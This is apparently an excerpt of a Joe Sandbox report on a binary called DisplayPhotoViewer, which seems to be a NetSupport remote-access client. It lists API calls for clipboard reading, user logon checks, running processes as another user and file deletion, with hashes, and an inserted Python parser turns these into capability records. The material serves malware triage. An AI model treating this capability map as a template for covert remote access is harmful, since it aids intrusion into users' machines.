                                                                                                    • FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110C7B3D
                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 110C7B66
                                                                                                    • LockResource.KERNEL32(00000000), ref: 110C7B8A
                                                                                                    • DialogBoxIndirectParamA.USER32(00000000,00000000,00000000,Function_000C6770,111B1884), ref: 110C7BBB
                                                                                                    • DialogBoxParamA.USER32(00000000,?,00000000,Function_000C6770,111B1884), ref: 110C7BDA
                                                                                                      • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ResourceWindow$DialogExitParamProcess$ErrorFindForegroundIndirectLastLoadLockMessageVisible_strrchrwsprintf
                                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$Error. NSMDialog!CreateModal has invisible parent$hGlobal || !"Unable to load resource"$hRsrc || !"Unable to find resource"$m_attached == NULL$pDlgTemplate || !"Unable to lock resource"
                                                                                                    • API String ID: 2167286109-1263985265
                                                                                                    • Opcode ID: fe06b98fa4af126c2873b655e0d218807ea2e3a7387f91f75aba942c8ab63bc5
                                                                                                    • Instruction ID: 4b268077d53f9e6000ba96f399470a05e12971b26c564414febea3e2638d5111
                                                                                                    • Opcode Fuzzy Hash: fe06b98fa4af126c2873b655e0d218807ea2e3a7387f91f75aba942c8ab63bc5
                                                                                                    • Instruction Fuzzy Hash: 68619675E0060AABD701DFA5DC84F9FB7B8AF84718F1085A9F915E7245EB34F5008BA1
APIs
• _calloc.LIBCMT ref: 11039286
• _free.LIBCMT ref: 11039380
  • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
  • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
  • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
  • Part of subcall function 110C7F50: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110C7FD5
  • Part of subcall function 110C7F50: LoadResource.KERNEL32(00000000,00000000), ref: 110C8004
  • Part of subcall function 110C7F50: LockResource.KERNEL32(00000000), ref: 110C8028
  • Part of subcall function 110C7F50: CreateDialogIndirectParamA.USER32(00000000,00000000,1104DFC6,110C6770,00000000), ref: 110C8059
  • Part of subcall function 110C7F50: CreateDialogIndirectParamA.USER32(00000000,00000000,1104DFC6,110C6770,00000000), ref: 110C8074
  • Part of subcall function 110C7F50: GetLastError.KERNEL32 ref: 110C8099
• _calloc.LIBCMT ref: 11039395
• _free.LIBCMT ref: 110393D0
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_malloc_memsetwsprintf
• String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
• API String ID: 2195741704-1552251038
• Opcode ID: a335a084d689679c10410774422ffd3118dd5cd7ab3bc0a1b0a2b291840903c7
• Instruction ID: 4086767be7b95815a8b87adeca8a1087e66975d2fdd9eacf41386359a10bf509
• Opcode Fuzzy Hash: a335a084d689679c10410774422ffd3118dd5cd7ab3bc0a1b0a2b291840903c7
• Instruction Fuzzy Hash: 976104B5E54616AFD701DFA0CCC0FADB3A0EF84719F104269E9265B3D0EBB16980C782
APIs
• _memset.LIBCMT ref: 11103385
• wsprintfA.USER32 ref: 111033A9
• FindFirstFileA.KERNEL32(?,?,00000000), ref: 111033C6
• wsprintfA.USER32 ref: 11103402
  • Part of subcall function 11159EA0: DeleteFileA.KERNEL32(?,?,111522DC,?), ref: 11159EA8
  • Part of subcall function 11159EA0: GetLastError.KERNEL32(?,111522DC,?), ref: 11159EB2
  • Part of subcall function 11159EA0: __dosmaperr.LIBCMT ref: 11159EC1
• FindNextFileA.KERNEL32(00000000,?), ref: 1110341B
• GetLastError.KERNEL32 ref: 1110343B
• FindClose.KERNEL32(00000000), ref: 1110345B
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: FileFind$ErrorLastwsprintf$CloseDeleteFirstNext__dosmaperr_memset
• String ID: %s\%s$%s\*.*$.$rmdir(%s) ret %d, errno=%d, lasterr=%d
• API String ID: 3263656767-2664646196
• Opcode ID: 3b8f3e68857d2d4d5fcedd3b5ea9a60a67ccb2e3a7f69852d6573a2c97759908
• Instruction ID: cf9f743203e2a23cfd4e8d90bfdbf3fe1bbd3cd6a687f32fbdc73053cc0a656c
• Opcode Fuzzy Hash: 3b8f3e68857d2d4d5fcedd3b5ea9a60a67ccb2e3a7f69852d6573a2c97759908
• Instruction Fuzzy Hash: 8121D8BAD112246BDB52DF64DC88FEEF7BC9B49308F0041A8E91997141F774AB84CB61
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID:
• String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
• API String ID: 0-293745777
• Opcode ID: 2e0e51da2579283ce9c57ec42524f3efbcaf938c7d324a83d20cdd8291c19af9
• Instruction ID: a78f3a660f14f01d53fcd2939d51c488e34b6a73c0896110cc3ba89edf073858
• Opcode Fuzzy Hash: 2e0e51da2579283ce9c57ec42524f3efbcaf938c7d324a83d20cdd8291c19af9
• Instruction Fuzzy Hash: D1A1C135F102059FD750DBA5DC91FAAB3B5EFC970AF10419DEA4A9B280EB31B901CB91
APIs
• GetTickCount.KERNEL32 ref: 110ED44F
• LogonUserA.ADVAPI32(?,00000000,?,?,?,FFFFFFFF), ref: 110ED4FE
• GetTickCount.KERNEL32 ref: 110ED506
• GetLastError.KERNEL32 ref: 110ED53E
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CountErrorLastTick$ExitLogonMessageProcessUserwsprintf
• String ID: IsA()$LogonUser(%s, %s) took %d ms, ret %d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$null
• API String ID: 307273675-931856353
• Opcode ID: 626212a95fd8a79f4c99d9a346964a5706acebf1686333d03147c27613f49f55
• Instruction ID: 82ef7d15e9b14f072953cdb22b61fd3da3fec28d419b9bf44d0beb19ea222cae
• Opcode Fuzzy Hash: 626212a95fd8a79f4c99d9a346964a5706acebf1686333d03147c27613f49f55
• Instruction Fuzzy Hash: 1331A2B9A00A06AFD710DF5AD888E5BF7F9FF98318B108159E85997350E730F905CBA0
APIs
  • Part of subcall function 11153370: GetVersionExA.KERNEL32(?), ref: 1115339E
• _memset.LIBCMT ref: 111533ED
  • Part of subcall function 11153280: FindWindowA.USER32(00000000,00000000), ref: 111532CA
• CreateProcessAsUserA.ADVAPI32(00000000,?,?,75BF7B80,0B2326C8), ref: 11153423
• GetLastError.KERNEL32(?,75BF7B80,0B2326C8), ref: 1115342F
• WinExec.KERNEL32(?,00000001), ref: 11153438
• CloseHandle.KERNEL32(?,?,75BF7B80,0B2326C8), ref: 11153459
• CloseHandle.KERNEL32(111537B5,?,75BF7B80,0B2326C8), ref: 1115345F
• WinExec.KERNEL32(?,00000001), ref: 1115346F
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CloseExecHandle$CreateErrorFindLastProcessUserVersionWindow_memset
• String ID: D
• API String ID: 4112535333-2746444292
• Opcode ID: ee08a1fab5bd3212d4cda7f4f796d318be445dce19d67ebb5ca42c48f8cfc531
• Instruction ID: 6edb9f54fdcd4f2c91ccb4d41e9a6f02da4056e67d9a63584d83a24ff9daa757
• Opcode Fuzzy Hash: ee08a1fab5bd3212d4cda7f4f796d318be445dce19d67ebb5ca42c48f8cfc531
• Instruction Fuzzy Hash: F41138767502196BDB20DBF8EC45FAEB368DB84B04F108125FF19EB2C4D9B0A40487E1
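The per-function blocks above (resolved API calls, "Part of subcall function" lines, the `$`-separated String ID list, and the opcode and instruction hashes) follow one fixed layout, so a report of this size is easier to triage by parsing it than by scrolling it. The following is an added example, not code from the Joe Sandbox report or from the NetSupport client it analyses: it parses that plain-text layout into per-function records and maps each function's API set onto the capabilities the report's signature section names (clipboard reading, LogonUser credential checks, CreateProcessAsUser, recursive file deletion). The `CAPABILITIES` table and the `SAMPLE` text are constructed for the example; `SAMPLE` copies three of the blocks on this page with the memory-dump and hash lines shortened, and its last block is deliberately left without a closing Instruction Fuzzy Hash line to show how a truncated page is handled.

```python
"""Turn Joe Sandbox per-function listings into capability records.
Added example, not code from the report or from the NetSupport client it analyses.
CAPABILITIES and SAMPLE are constructed for the example; SAMPLE copies three
blocks from this page with the memory-dump and hash lines shortened.
"""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# One resolved call, e.g. "FindFirstFileA.KERNEL32(?,?,00000000), ref: 111033C6"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s+(?P<call>.+)$")
# Report label -> attribute; "Instruction Fuzzy Hash" is the last line of every complete block
FIELDS = {"API ID": "api_id", "API String ID": "api_string_id", "Opcode ID": "opcode_id",
          "Instruction Fuzzy Hash": "instruction_fuzzy_hash"}
# Capability -> Win32 exports that must all appear, as direct calls or inside subcalls (constructed)
CAPABILITIES = {
    "clipboard_read": ("IsClipboardFormatAvailable", "GetClipboardData"),
    "credential_validation": ("LogonUserA",),
    "run_as_other_user": ("CreateProcessAsUserA",),
    "recursive_delete": ("FindFirstFileA", "FindNextFileA", "DeleteFileA"),
}
# subcall_of holds the callee address when the line read "Part of subcall function <addr>: ..."
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""

    def capabilities(self):
        names = {c.name for c in self.calls}
        return sorted(cap for cap, need in CAPABILITIES.items() if all(n in names for n in need))


def _parse_call(text, subcall_of=""):
    m = API_RE.match(text)
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") else []
    return ApiCall(m.group("name"), m.group("module"), args, m.group("ref").upper(), subcall_of)


def parse_report(text):
    """Split the listing into records; a trailing block with no fuzzy-hash line (truncated page) is kept."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        sub = SUBCALL_RE.match(line)
        call = _parse_call(sub.group("call"), sub.group("fn")) if sub else _parse_call(line)
        if call:
            cur.calls.append(call)
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue  # bare section labels: APIs, Strings, Yara matches, Similarity
        value = value.strip()
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        elif key in FIELDS:
            setattr(cur, FIELDS[key], value)
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    if cur.calls or cur.strings:
        records.append(cur)
    return records


def summarize(text):
    """One dict per function: block identity plus the capabilities derived from its API set."""
    return [{"opcode_id": r.opcode_id, "api_count": len(r.calls),
             "subcall_apis": sorted({c.name for c in r.calls if c.subcall_of}),
             "capabilities": r.capabilities(), "strings": r.strings} for r in parse_report(text)]


SAMPLE = r"""
APIs
• FindFirstFileA.KERNEL32(?,?,00000000), ref: 111033C6
• wsprintfA.USER32 ref: 11103402
  • Part of subcall function 11159EA0: DeleteFileA.KERNEL32(?,?,111522DC,?), ref: 11159EA8
• FindNextFileA.KERNEL32(00000000,?), ref: 1110341B
• FindClose.KERNEL32(00000000), ref: 1110345B
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: FileFind$ErrorLastwsprintf$CloseDeleteFirstNext__dosmaperr_memset
• String ID: %s\%s$%s\*.*$.$rmdir(%s) ret %d, errno=%d, lasterr=%d
• Opcode ID: 3b8f3e68857d2d4d5fcedd3b5ea9a60a67ccb2e3a7f69852d6573a2c97759908
• Instruction Fuzzy Hash: 8121D8BAD112246BDB52DF64DC88FEEF7BC9B49308F0041A8E91997141F774AB84CB61
APIs
• LogonUserA.ADVAPI32(?,00000000,?,?,?,FFFFFFFF), ref: 110ED4FE
• GetLastError.KERNEL32 ref: 110ED53E
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
• String ID: IsA()$LogonUser(%s, %s) took %d ms, ret %d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$null
• Opcode ID: 626212a95fd8a79f4c99d9a346964a5706acebf1686333d03147c27613f49f55
• Instruction Fuzzy Hash: 1331A2B9A00A06AFD710DF5AD888E5BF7F9FF98318B108159E85997350E730F905CBA0
APIs
• IsClipboardFormatAvailable.USER32(?), ref: 11031201
• GetClipboardData.USER32(?), ref: 1103121D
"""

if __name__ == "__main__":
    for entry in summarize(SAMPLE):
        print(entry["opcode_id"][:16] or "(truncated block)", entry["capabilities"], entry["api_count"])
```

Two design points matter for real reports. Subcall lines are folded into the caller's API set, because a capability such as the recursive delete above only shows up when `DeleteFileA` from the helper at 11159EA0 is counted together with the caller's `FindFirstFileA`/`FindNextFileA`; the `subcall_of` field keeps that provenance so the two can still be told apart. Blocks are closed on the Instruction Fuzzy Hash line rather than on the `APIs` label, since a function with no resolved imports (like the clipboard-strings block above) has no `APIs` section at all.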
                                                                                                    APIs
                                                                                                    • IsClipboardFormatAvailable.USER32(?), ref: 11031201
                                                                                                    • GetClipboardData.USER32(?), ref: 1103121D
                                                                                                    • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 1103129C
                                                                                                    • GetLastError.KERNEL32 ref: 110312A6
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110312C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                                    • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                                    • API String ID: 1861668072-1296821031
                                                                                                    • Opcode ID: 7fb89025581069bdcf35070ac69ac1d1e427d8eec964e9236c398e85b8c4ee47
                                                                                                    • Instruction ID: eadcb4ebb7396660cd31340bb2b7f48e3c32a37211be3cdd70676a935022b8ce
                                                                                                    • Opcode Fuzzy Hash: 7fb89025581069bdcf35070ac69ac1d1e427d8eec964e9236c398e85b8c4ee47
                                                                                                    • Instruction Fuzzy Hash: 7C21B571A2015A9FCB01DFE9E8809BEF7F8EF8D719F4040AAEC15D7240DA3199118B91
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 1070E73A
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000001), ref: 1070E74D
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,00000000,00000080,?,?,00000000,00000080,00000000,?,?,00000001), ref: 1070E774
                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 1070E79D
                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 1070E7E0
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 1070E806
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1691099609-0
                                                                                                    • Opcode ID: 7e7bbbfe3c6b28ae33c670cf63860e04bf6c604ceb6828c0a52124bd8263ff25
                                                                                                    • Instruction ID: 6bad95b4840c4dcaf3998a9b1e50be7531795b6ff257536d36cc027ec05cac4d
                                                                                                    • Opcode Fuzzy Hash: 7e7bbbfe3c6b28ae33c670cf63860e04bf6c604ceb6828c0a52124bd8263ff25
                                                                                                    • Instruction Fuzzy Hash: 74314B31A01229FBCF628F55CC89A8F7FA9FB0ABA0F108A15F515A51E4D7708950DBE1
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,10715E60,00000001,00000004,00000000,?,?,00000001), ref: 1070E627
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,10715E60,00000001,00000004,00000000,?,?,00000001), ref: 1070E63A
                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,00000000,00000004,?,10715E60,00000001,00000004,00000000,?,?,00000001), ref: 1070E661
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,00000000,00000000,?,10715E60,00000001,00000004,00000000,?,?,00000001), ref: 1070E686
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,10715E60,?,10715E60,00000001,00000004,00000000,?,?), ref: 1070E6C7
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,10715E60,?,10715E60,00000001,00000004,00000000,?,?), ref: 1070E6E8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1691099609-0
                                                                                                    • Opcode ID: 6271b2e01a5bf319f6370c90b93506c5df92b63f566820cf2fbbea478ce06ac5
                                                                                                    • Instruction ID: 84a5001fc4db201296a625aa3e476951f052089fe19a65eef1dd580f0715c1a1
                                                                                                    • Opcode Fuzzy Hash: 6271b2e01a5bf319f6370c90b93506c5df92b63f566820cf2fbbea478ce06ac5
                                                                                                    • Instruction Fuzzy Hash: 7731D131A00269FBCF628F55DC89F9F7FB5FB5AB90F108A19F811A11A4D3728850DB94
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 11161447
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1116145C
                                                                                                    • UnhandledExceptionFilter.KERNEL32(111B53C0), ref: 11161467
                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 11161483
                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 1116148A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
